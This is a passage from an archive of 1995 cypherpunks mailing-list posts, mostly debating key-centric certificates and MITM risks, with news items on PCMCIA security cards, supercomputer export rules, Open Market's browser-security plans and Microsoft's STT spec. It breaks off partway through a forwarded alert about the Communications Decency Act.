the cancel came from the same total stranger, and without establishing any
further trust for the stranger. There are tens of millions of people with
Usenet access. It's an overkill to collect a key from each one to allow them to
cancel their articles. NoCeM is a very promising protocol for allowing trusted
third parties to eliminate articles by posting PGP-signed notices. (e.g.,
CancelMoose new way of killing spam -- no more forged cancels from CM!)

ObMoosePoem: :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-)
Moose, Moose, wonderful Moose!
Tramples spam with a hoof;
Spammers go through the roof.
Moose, Moose, wonderful Moose!
Rids us of ugly spam.
Fond of the Moose I am.
Moose, Moose, wonderful Moose!
:-) I have to go _right _now.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Smart <smart@mel.dit.csiro.au>
Date: Thu, 5 Oct 95 16:02:51 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510051924.MAA25839@jobe.shell.portal.com>
Message-ID: <199510052302.AA11892@shark.mel.dit.csiro.au>
MIME-Version: 1.0
Content-Type: text/plain


I strongly support what Carl Ellison is saying. I've been meaning to write
up something on it for so long that I must accept I'll never do it. So
here instead is a quick example.

 > I don't understand this whole discussion.

The idea is to make the public key the centre of the architecture instead
of being an attribute of some other centre (e.g. distinguished name).

Consider the IPSEC case. The current situation is:

1. We go through some process, let's call it Process A, where we determine
   that we want to talk to IP address 192.9.8.7.

2. We go through another process where we obtain the public key of 192.9.8.7.

3. We then try to decide, based on one or more certificates, whether we
   trust the public key to be the correct public key for 192.9.8.7.

Now consider the key-centric version.

1. Process A returns a public key which denotes the destination we want to
   talk to.

2. We then go through a process to obtain the IP address that belongs to
   that public key. We probably won't use the public key as an index to
   get that information. We probably use the information that was input
   to Process A. In fact this information may fall out as a byproduct
   of Process A. [However if we needed to make a scalable distributed
   database of RSA public keys then I have a design to do this -
   available on application.]

3. We don't need to trust any certificates or anything else at this stage.
   The fact that the IP address belongs to the Public Key is signed by
   the Public Key itself.

The same thing happens with e-mail. If "Process A" gives us an e-mail
address to send to then we worry about whether we have the right public
key to go with it. If Process A gives us a Public Key then we can
have certainty about the associated e-mail address because the association
is signed by the Public Key.

And a big win that just falls out of this is that I can have a
continuous exchange of information with one IP destination even if
it keeps changing its actual IP address (mobile computing) or I
can have an e-mail conversation with a person who keeps changing
their e-mail address. The things you want just fall out instead of
requiring clever software solutions.

 >  A certificate is a signed
 > binding of a key and a unique name, right? 

In the key-centric world a certificate binds some attribute as a property
of a publc key. So an X.509 certificate would say "The owner of this
public key [i.e. person who knows the corresponding private key] owns
the following point in the X.500 namespace", rather than that "the
person identified by this DN owns the following publc key". Experience
has shown that the latter interpretation is a mine-field. It really
doesn't work.

The idea of a key-centric architecture is the proverbial "idea whose time
has come". There are echoes of it in MOSS and in STT. But it really calls
out for a group to work out a complete architecture. If someone wants to
start such a discussion I'll make sure I make time to be part of the process.

Bob Smart





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schampeo@imonics.com (Steve Champeon (working from home))
Date: Fri, 6 Oct 95 06:00:52 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re:Trust company banks on Internet
Message-ID: <v02120d01ac9ae6b15274@[205.139.212.66]>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga forwards:

>First Internet Banker  ??  !!
>
>Check out
>http://www.bayshore.com
>
>>From the Toronto Globe and Mail page B 1
>       Fri 6 Oct 95
>"Bayshore set to become first Internet banker  -
>Trust promises approval in as little as two minutes"

This is fairly common. A certain Internet Consultant in this
area claimed to have solved "the problem of banking on the
Internet". Of course, a large green bank paid him a lot of
money to say it, but there you are. I closed my account
with that large green bank because of this appalling turn of
events.

I should tell everyone here and now that I also intend to
become the first Internet bank. I would also like to announce
my upcoming trip to the moons of Mars, where I intend to pick
collards in the name of Abbie Hoffman.

What an extended crock of shit we can hope to expect...

Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo@imonics.com
Imonics Web Services                    webmaster@imonics.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 6 Oct 95 09:09:12 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
Message-ID: <199510061608.JAA17323@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes, quoting me:

Mike>Seems to me that the idea of "communicating with the person you think
Mike>you are" is intractably difficult if you're not sitting in the same
Mike>room. ...

Hal> I can certainly agree with the attractive simplicity of this notion.  My
Hal> point is that it is practically useless. ...

Mike>Oddly enough, it seems to me that Hal (if that really *is* his name)
Mike>and I (and Carl & others) are saying basically the same things, but
Mike>drawing completely different conclusions.  Strange.  I'm willing to
Mike>wait to see what the peer review process concludes.

I am afraid you have quoted this out of context and thereby exactly
reversed the sense of what I was saying.  Hence we are not saying the
same things, but rather we are saying opposite things.  The full quote is:

Mike>Seems to me that the idea of "communicating with the person you think
Mike>you are" is intractably difficult if you're not sitting in the same
Mike>room.  If you accept instead the idea of "communicating with the
Mike>entity possessing the private half of a keypair" then life gets a lot
Mike>simpler. 

Hal>I can certainly agree with the attractive simplicity of this notion.  My
Hal>point is that it is practically useless.

By "this notion" I was referring to the second sentence rather than the
first, the idea that we are communicating with whomever holds the key.
This was the one which you said would make life simpler, and so I hoped
that by agreeing about its simplicity it would be clear which of the two
competing ideas I was referring to.  Apparently it was ambiguous, so I
apologize for being unclear.

It is disturbing that even after reading that very long message my
position could be interpreted as being the opposite of what it is.
Apparently my arguments are not being well understood.  I will have to
think about this issue more and try to express myself better.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 6 Oct 95 10:10:07 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <2264.9510061657@misun2.mi.leeds.ac.uk>
Message-ID: <199510061708.KAA27047@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


jbaber@mi.leeds.ac.uk writes (where I have taken the liberty of
reformatting for 80 columns):

> Now mail is far easier to fake/intercept than a digital
> signature/encryption - at least I hope so. Therefore if Hal where to
> sign all of his messages I could check the signatures with a public key
> obtained from anywhere at all and if they passed then I could be
> confident that the messages were all written by the entity with control
> of the secret part of the key - at least far more confident than I am
> at all of the mail from hfinney@shell.portal.com actually comes from
> there. So instead of me getting the idea that hfinney@shell.portal.com
> posts interesting messages I get the idea that the holder of the secret
> key posts interesting messages - I would probably still use the mail
> address as keys are less convenient with current mail readers but that
> is an implementation problem. Hals reputation is therefore transfered
> to they key - no matter where I got the key from. So if I send
> encrypted mail to the person with the private part of Hal's key I can
> be sure that it can only be read by the person who actually sent the
> messages pertaining to be from Hal.

Well, this is not necessarily the case.  A MITM may be signing my
messages for me, and then putting them back the way they were before I
am allowed to see them.  Granted, this would not be easy, and perhaps
the difficulty of this would be great enough that you will feel
comfortable using an unsigned key.  But if it were accomplished, then
your messages to me would actually be insecure.  No matter how
convinced you became of my sincerity and trustworthiness, actually our
conversations would be overheard by a third party despite both of our
efforts to the contrary.  Our use of encryption would be rendered
futile.  Doesn't this bother you?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Fri, 6 Oct 95 07:17:57 PDT
To: cypherpunks@toad.com
Subject: Re: PCMCIA Crypto
In-Reply-To: <199510061106.MAA16083@utopia.hacktic.nl>
Message-ID: <199510061409.OAA00401@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> The proposal to form the Group was presented to PCMCIA by
> Spyrus, Inc. of San Jose, California.  The group will be
> co-chaired by Edward Tuggle of IBM Corporation and Visser
> of Spyrus, Inc.

For those of you who don't recognize the company name, Spyrus makes
one version of the Tessera^H^H^H^H^H^H^HFortezza card.

Is Spyrus the Toys 'R Us for spies? :-)

					- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMHU4l7T+rHlVUGpxAQEQOgP/bZnHvqGARiyjf2Ua81eycssryENfvJX+
h3H295OXJAxmmw/4ppCzbTyqCntt0TtXVaYZqq5x3Zated99bXdYnbsAAfwW5hT6
SHn6VyYrRfuwVhb+7QrHS0fcQG3ecrw3dyhfchzIK5w0XZTwz5KCcQJrmcyG3Ny6
HMy2uc8H0p8=
=uwrb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyle_Seaman@transarc.com
Date: Fri, 6 Oct 95 07:16:38 PDT
To: steven@echonyc.com
Subject: Re: Web "places" and the media monsters
In-Reply-To: <Pine.3.89.9510041010.A16263-0100000@echonyc>
Message-ID: <8kRHcbOSMV1ZAbs3MW@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


Steven Levy <steven@echonyc.com> writes:
> A tiny correction to Vladimir's interesting posting. It wasn't J.Gilmore 
> I quoted on the "Titanic deck chair" in the NY Times, it was J.Barlow, 
> who indeed has a propensity for soundbyte. 

Which is not to say that the quote originated there.  My father-in-law
used to refer to Wang Labs that way, back in the mid-80's, and I'm
fairly sure that he picked it up at Memorex.  And the meme goes on...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 6 Oct 95 10:28:52 PDT
To: sjb@universe.digex.net
Subject: Re: subjective names and MITM
Message-ID: <9510061724.AA01171@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> A public key *is* "very probably unique".  A "randomly selected" 1024 bit
> prime number has a specific amount of entropy in it.  The likelihood of
> two users world wide "randomly" choosing the same such prime may be
> precisely determined (assuming you can figure the entropy).
> 
Given the difficulty of finding primes, how likely do you think it is that
given one of the well known methods and finding the first 1024 bit prime
that pops out would give you an effective attack?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 6 Oct 95 07:38:10 PDT
To: cypherpunks@toad.com
Subject: Supercomputer export ease
Message-ID: <9510061437.AA18425@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


According to a squib in the local tabloid:  Clinton has approved a plan to
ease export restrictions on the sale of supercomputers.  The decision is
expected to be announced today; it follows DoD recommendations.  The
wording is funky enough to be interpreted a couple of ways, so here's a
quote:  "Under the revised policy, U.S.firms will be able to sell billions
of dollars worth of high-tech computers to civilian customers around the
world.  Currently manufacturers must seek licenses from the Commerce Dept.
to sell a computer that can perform more than 1,500 million theoretical
operations per second."  Does that mean no more licenses, the mFLOP limit
has been raised before license required, there is no limit but you still
need a license?

Answers today/tomorrow when the policy comes out, I guess.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 6 Oct 95 08:43:58 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
Message-ID: <9510061543.AA26079@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hfinney@shell.portal.com writes:
 > m5@dev.tivoli.com (Mike McNally) writes:
 > >hfinney@shell.portal.com writes:
 > > > There is a difference between a MITM and the case you describe ...
 > 
 > >Seems to me that the idea of "communicating with the person you think
 > >you are" is intractably difficult if you're not sitting in the same
 > >room. ...
 >
 > I can certainly agree with the attractive simplicity of this notion.  My
 > point is that it is practically useless. ...

Oddly enough, it seems to me that Hal (if that really *is* his name)
and I (and Carl & others) are saying basically the same things, but
drawing completely different conclusions.  Strange.  I'm willing to
wait to see what the peer review process concludes.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 6 Oct 95 09:03:28 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: subjective names and MITM
In-Reply-To: <199510060224.WAA03180@homeport.org>
Message-ID: <199510061603.MAA18239@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
>	The key does indeed have a high likelihood of being unique,
>but dealing with 1024 bit identifiers could strain database systems,
>especially when 100 well chosen bits would be than enough.

Hence the suggestion to use a hash of the key instead of the key
itself.  Someone pointed out that a uniformly distributed 1024 bit
prime has something like 1014 bits of entropy.  An md5 hash of the key
should have about 128 bits of entropy, with the probability of a
collision among 2^33 keys (one per person, worldwide) being about
1 in 2^95, or about 1 in 10^29.  Sounds like we're safe, even without
straining our databases.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 6 Oct 95 11:09:21 PDT
To: hfinney@shell.portal.com
Subject: Re: Certificate proposal
Message-ID: <9510061805.AA01185@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I may not have been clear: the certificate I was referring to was the one
> from Egghead, the one which I will use to make sure that I have a valid
> key for Egghead.  Such a certificate would of course not have my credit
> card number; it would probably have some information related to Egghead.
> My rhetorical point was that information would most plausibly be a NAME
> by which I would refer to Egghead.  I am still trying to understand how
> these proposals to take names out of the picture will apply to a
> commonplace situation like this one.

The certificate would identify the entity you're having commerce with.  It
doesn't have to have a name, the certificate would replace the need for a
name.  If you wanted a name, you could use the certificate to access it.
The certificate would give you a public key that would be the central
identifier.  Associated with it might be many attributes of the key-entity.
You might use the key to find out a name, and bank account number, or
an ip-address to use to communicate with.  Don't think of it as being a
name, "Egghead Software", and this is the key associated with it.  Think
of the key as the central thing.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 6 Oct 95 08:07:14 PDT
To: rsalz@osf.org
Subject: Supercomputer export ease
Message-ID: <199510061507.LAA20157@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   WSJ, Oct 6, 1995.


   U.S. Export Rules to Ease On Some Supercomputers


   Washington -- President Clinton is expected to announce
   today that he is easing export restrictions on certain U.S.
   supercomputers, a move sought by the computer industry.

   Administration officials say that given continuing
   technological advances and world-wide availability of many
   high-speed computers, the current restrictions are
   unrealistic and damaging to American companies. Critics
   contend, however, that easing the restrictions will
   exacerbate weapons proliferation.

   Mr. Clinton approved raising the speed of computers that
   may be exported to most countries to 2,000 million
   theoretical operations a second, or MTOPS, from 1,500
   MTOPS, according to officials. For certain nations,
   including China, Egypt, Israel, India, Pakistan, Syria and
   Russia, civilian customers would be able to buy computers
   with speeds up to 7,000 MTOPS without prior government
   approval. Military customers in those countries could
   purchase computers with speeds of 2,000 to 7,000 MTOPS but
   only with an individual export license.

   Certain nations, such as Iran, Iraq, North Korea and Libya,
   would still be banned from buying high-speed computers.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 6 Oct 95 10:35:53 PDT
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: Graphic encryption
Message-ID: <9510061622.AA02423@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Is there anything particular in graphic encryption? I usually
>  encrypt graphics and document images as regular files with regular
>  encryption...

I believe graphic encryption outputs a valid image file that is apparently  
white noise until you perform the decryption transformation on it.  An  
obvious way to do this with a non-lossy file format is to encrypt pixel vales  
with a stream cipher.  Another way to make the image unviewable would be to  
shuffle the pixels or rasters with a PRNG.

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 6 Oct 95 12:12:42 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <199510061829.LAA04524@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DG0EzA.Gs5@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:
> tomw@orac.engr.sgi.com (Tom Weinstein) writes:

>> Um, just a wild guess, but... your credit card number maybe?  (Well,
>> okay, its hash.)

> I may not have been clear: the certificate I was referring to was the one
> from Egghead, the one which I will use to make sure that I have a valid
> key for Egghead.  Such a certificate would of course not have my credit
> card number; it would probably have some information related to Egghead.
> My rhetorical point was that information would most plausibly be a NAME
> by which I would refer to Egghead.  I am still trying to understand how
> these proposals to take names out of the picture will apply to a
> commonplace situation like this one.

Yes, it seems I misunderstood you.  There would have to be some binding
between the key of the merchant and some identifying information that
would allow the user to verify the merchant's identity.  This could take
the form of a True Name for the merchant and a trusted CA.  Another
approach would take the form of an FQDN, an IP address and a trusted CA.
In this case the software would have to verify that the FQDN and IP
address match the URL and DNS lookup, respectively.  Unfortunately, this
also requires that any time the IP address changes that the merchant get
a new certificate.  Also, the CA must be checked to verify that the
certificate hasn't been revoked, or you run the risk of an attacker
getting the old IP address.

Does anyone see any other options?

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 6 Oct 95 09:08:20 PDT
To: cypherpunks@toad.com
Subject: Re: Graphic encryption
Message-ID: <199510061606.MAA06883@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510061517.IAA10725@ix5.ix.netcom.com>,
privsoft@ix.netcom.com (Steve ) wrote:

> I am currently working for a company that has a graphic encryption 
> product called PrivaSoft. I was wondering if there were other products 
> or engines that also provide graphic encryption. (graphic encryption is 
> the use of a encryption algorythm to scramble an image taken of a 
> document.) 
>  
> Also if any of ya'll are famillar with graphic encryption, I am looking 
> for opinions as to its strengths / weaknesses.

The description you give us is meaningless. The strengh of an encryption
alogirithm must depend only on the algorithim and key used, not on the
data (in your case graphics) being encrypted. It is utterly irrelevant
_what_ is being encrypted, all that matters is _how_ it is being
encrypted. Send us the algorithm and source code and we'll take a look at
it.

And by the way, "proprietary" algorithms are generally junk and should not
be relied upon by security concious individuals and businesses. Only
algorithms that have undergone extensive peer review should be considered
for use.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHVT7yoZzwIn1bdtAQEUOgGAnyOPIjo4D18AUDNDzXAcqRLXO7vcaRiw
ode3TBA5gLm1FaGPSEk5y5g3VKiVS6ai
=bV6Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 6 Oct 95 04:07:32 PDT
To: cypherpunks@toad.com
Subject: PCMCIA Crypto
Message-ID: <199510061106.MAA16083@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



PCMCIA Establishes Security Card Working Group

The dream of a standardized encryption interface may soon
be realized!


San Jose, Calif., Oct. 5 /PRNewswire/ -- PCMCIA has
formed a new Working Group dedicated to standardizing and
promoting the PC Card as an interface for data encryption
and digital signature applications.

The Working Group was formed to work within the PCMCIA
Technical Committee to help the Association define and
standardize the capabilities and requirements for PC Card
Security Card devices.  The Group's immediate goals are
to define the necessary extensions to the PC Card
Standard that will allow easy identification of Security
Card devices, and to proactively identify other vendors
in the market and solicit their support for standardizing
PC Cards as a security device.

The formation of this Group represents the formalization
of an industry trend.  A standardized form factor and
interface for security devices is finally an attainable
goal thanks to the widespread acceptance of PC Card
technology," said Gary Visser, a senior software engineer
with Spyrus Communications and Co-Chairperson of the
Working Group.  "It is this high level of host support
that will promote PC Cards as a solution for electronic
banking and commerce."

PC Cards are seen by many experts as an ideal solution
for digital signature and data encryption applications
due to the established base of PC Card slots, and because
most security applications are math intensive and require
the processing power and storage of computers.

The proposal to form the Group was presented to PCMCIA by
Spyrus, Inc. of San Jose, California.  The group will be
co-chaired by Edward Tuggle of IBM Corporation and Visser
of Spyrus, Inc.

Visit PCMCIA's World Wide Web site at
<http://www.pc-card.com>.

Contact:  Greg Barr, Public Relations Coordinator, of
PCMCIA, 408-433-2273, ext. 114, or <gbarr@pcmcia.org>.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 6 Oct 95 09:54:44 PDT
To: cypherpunks@toad.com (Good Guys)
Subject: Open Market, Inc. Announcing security products
Message-ID: <199510061654.MAA12549@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Open Market, Inc. Is announcing "free software and services that will
help hundreds of Internet-based businesses and millions of users
protect themselves from potential security breaches."

I don't know any more info.. I'll send more when available.


-- 
                Harry Hawk
                Manager of Computer Services
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Fri, 6 Oct 95 10:57:22 PDT
To: cypherpunks@toad.com
Subject: Transgenders begin lobbying against ITAR
Message-ID: <Pine.BSD.3.91.951006124333.9747C-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Transgender Lobby Days has come and gone.

I taught transgender persons about PGP and ITAR.
It got a good reception, and they are beginning to use it.

We went to all 535 congressional offices in two days,
and began to get the "transgender lobby block" noticed.
We did get all of the legislative staffers email addresses,
and will spill the results of this soon, so you can mount
an anti-ITAR campaign of you own.

I concentrated on the media galleries, and began to get the
transgender positions related to the media. We did get lots of
press, and a 20-20 piece coming soon.

They were all virtually uninformed about ITAR or the
Netscape situation. I did my best on ITAR while I was there.

This report is being filed at alt.coffee, a cybercoffeehouse
on Avenue A and 10th Street, in New York City. 

Gotta go this is costing 16.00 an hour to file.

Love Always,

Carol Anne


Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 6 Oct 95 10:20:45 PDT
To: cypherpunks@toad.com (Good Guys)
Subject: Open Market (more info)
Message-ID: <199510061720.NAA13378@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Basically they are going to set up a web site to act as a clearing
house for security related breaches.

On particular thing they will do is:

1) Hosting a web site where a user with any broswer can find out if
   their browser is secure. List security problems associated with
   that browser. "basically a self diagnostic center"

That will be done by tues.


-- 
                Harry Hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Johnson <rickj@microsoft.com>
Date: Fri, 6 Oct 95 13:56:51 PDT
To: perry@piermont.com
Subject: Re: Comments on STT Spec Implementation Details
Message-ID: <9510062200.AA01491@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes....

>My suggestion, which I made when Microsoft made a presentation at the
>IETF meeting in Stockholm and then had the gall to say "oh, no, we
>don't intend to publish an internet draft" is that you publish this as
>an internet draft and try to shepard it through the IETF's
>standardization process. You will, of course, be savaged, but that is
>in the interests of everyone, including you.

I talked to the two STT folks who were there.  I've also read the 
minutes of that meeting as published by Amir.  Politely, that 
particular meeting and the attempt to form a splintered variety of  WGs 
was viewed by the two STT folks attending as a pretty wild affair 
characterized by a lot of 5-10 minute speeches and the slimmest 
directional concensus.  A lot of great discussion, but low odds of 
coalescing into an effort leading to tangible results in a timely 
manner.   That doesn't mean there isn't value in putting proposals into 
the IETF standardization process, and it wasn't the content or intent 
of those people to impart that.  If we had other objectives we wouldn't 
have even bothered to go to Stockholm.

>The belief that companies can make more money by following proprietary
>solutions and imposing them on the world as standards is falling
>away.

Agreed...and not the content or intent of any comments made by the STT 
attendees at that meeting.

>It is in Microsoft's interest that the standard that is adopted
>for commerce be open, publically discussed at length, and brutally
>critiqued. Losing a bit of control in exchange for actually getting
>something that works out for you and your customers is in your interest.

Also agreed.  Want to pursue discussion in the internet community.  
Keep in mind, though, we're also obligated to deliver solutions to our 
customers in the very near term, and therefore publish the STT spec for 
those who wish to implement and interoperate with the systems we will 
deploy.  Certainly, it's reasonable and rational to want to evolve from 
that point within the guidelines of the IETF.  Based on what people's 
reaction to what we have put out for everyone to see, I'd be looking 
for comments from you all as to the most timely and beneficial course 
to pursue.  Looking forward to your input.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:52:13 1999
Subject: No Subject
Message-ID: <d41d8cd98f00b204e9800998ecf8427e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


When and where is the monthly Bay Area cypherpunks meeting?

---------------------------------------------------------------------------
Kevin S. Van Honr     | Uncle Sam needs YOU!
vanhorn@architext.com | But not vice versa.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 6 Oct 95 10:49:23 PDT
To: cypherpunks@toad.com (Good Guys)
Subject: Open Market, Inc. Announcing security products
In-Reply-To: <199510061747.NAA13827@cmyk.warwick.com>
Message-ID: <199510061749.NAA13856@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



Here is what they are going to do..

by tues 

1) Hosting a web site where a user with any browser can find out if
   their browser is secure. List security problems associated with
   that browser. "a self diagnostic center"

Using their knowledge base about browsers to create this feature.

shortly thereafter:

2) Creating ref. implementations for the Open Market server; methods
   of verifying what browser you are connecting with and lookup
   security bugs and or proceed with transaction. Make CGI scripts
   available for operators of other servers. Basically letting other
   sites do what they are doing it step 1.

3) Offer a free upgrade problem for people who have a server that has
   had a security breach. They can download a known secure server.
   This upgrade is for any commercial server browser that has a known
   breach. E.g., update a netsite server but not a CERN 3.0 server even
   if the CERN operator has hacked it to make it secure.

WWW.openmarket.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David A. Wagner" <dawagner@phoenix.Princeton.EDU>
Date: Fri, 6 Oct 95 16:27:01 PDT
To: cypherpunks@toad.com
Subject: 'net freedom of speech
Message-ID: <199510061914.PAA25802@flagstaff.Princeton.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I thought this might interest some of you here...

Note the email address for Senator Feingold where you can thank him,
without leaving your terminal!


Article: 64508 of comp.org.eff.talk
Path: cnn.Princeton.EDU!udel!news.sprintlink.net!simtel!news.kei.com!news.mathworks.com!panix!not-for-mail
From: shabbir@vtw.org (Shabbir J. Safdar)
Newsgroups: alt.activism,alt.motherjones,alt.politics.datahighway,alt.politics.usa.misc,alt.privacy,alt.society.civil-liberties,alt.wired,comp.org.cpsr.talk,comp.org.eff.talk,talk.politics.libertarian,talk.politics.misc,alt.censorship,misc.legal,alt.fan.rush-limbaugh,alt.sex.senator-exon,alt.society.civil-disob,alt.sex.stories.d,alt.bbs.allsysop
Subject: (ALERT) Sen. Feingold speaks up for free speech; thank him
Date: 1 Oct 1995 01:46:07 -0400
Organization: Voters Telecommunications Watch (email vtw@vtw.org)
Lines: 461
Sender: shabbir@panix.com
Distribution: world
Message-ID: <44l9uv$dmc@panix3.panix.com>
NNTP-Posting-Host: panix3.panix.com
Xref: cnn.Princeton.EDU alt.activism:120876 alt.politics.datahighway:10012 alt.politics.usa.misc:46797 alt.privacy:29041 alt.society.civil-liberty:49866 alt.wired:20952 comp.org.cpsr.talk:6658 comp.org.eff.talk:64508 talk.politics.libertarian:46422 talk.politics.misc:369284 alt.censorship:66917 misc.legal:149492 alt.fan.rush-limbaugh:41505 alt.society.civil-disob:580 alt.sex.stories.d:15167 alt.bbs.allsysop:14512



========================================================================
       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
	(SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)

	Update: -Latest News:
			Feingold releases letter to Committee members
			identifying First Amendment issues with CDA
			legislation.

		-What You Can Do Now:
